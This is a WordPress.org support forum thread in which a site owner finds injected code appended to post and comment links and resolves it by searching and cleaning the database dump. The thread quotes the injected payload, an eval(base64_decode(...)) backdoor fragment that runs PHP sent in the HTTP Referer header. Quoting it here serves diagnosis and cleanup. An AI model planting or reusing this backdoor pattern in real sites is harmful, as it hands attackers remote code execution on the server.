WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Hacked? Links are broken (7 posts)

  1. geoff67
    Member
    Posted 4 years ago #

    I've been trying to fix this for 4 hours now and can't seem to figure out what's wrong.

    Dynamically generated links (posts, comments, etc) have the following appended to their ends.
    %&({$eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

    I've looked at countless hacked threads, php injection solutions, Googled everything I can think of, and I've done all of the steps to Hardening WP.

    Any idea what's going on, or where to look next?

  2. geoff67
    Member
    Posted 4 years ago #

    Oh, and here's the link to the website: shafr.org.

  3. figaro
    Member
    Posted 4 years ago #

    Hummm...I've typically seen that in the source code, but it looks like yours may be in the database. Have you looked in wp-config.php to make sure it's clean?

  4. geoff67
    Member
    Posted 4 years ago #

    wp-config.php is normal. DB stuff at top, keys, table prefix, lang and the wp-settings.php line.

  5. figaro
    Member
    Posted 4 years ago #

    I would suggest dumping your db and searching it. Typically, this code will be exactly the same, so once you find one instance of it, you can do a search/replace to clean it, then drop your original tables and import your cleaned db. Of course, this will not fix the problem that allowed this in the first place, but it should get you an operational blog back.

  6. geoff67
    Member
    Posted 4 years ago #

    Thanks for the suggestion. I found 38 instances, in 4 variations. Uploading new db now.

    Do you know what would've caused this? I don't want another SQL bug.

  7. geoff67
    Member
    Posted 4 years ago #

    Amazing. That fixed it. Thanks so much, figaro.

Topic Closed

This topic has been closed to new replies.

About this Topic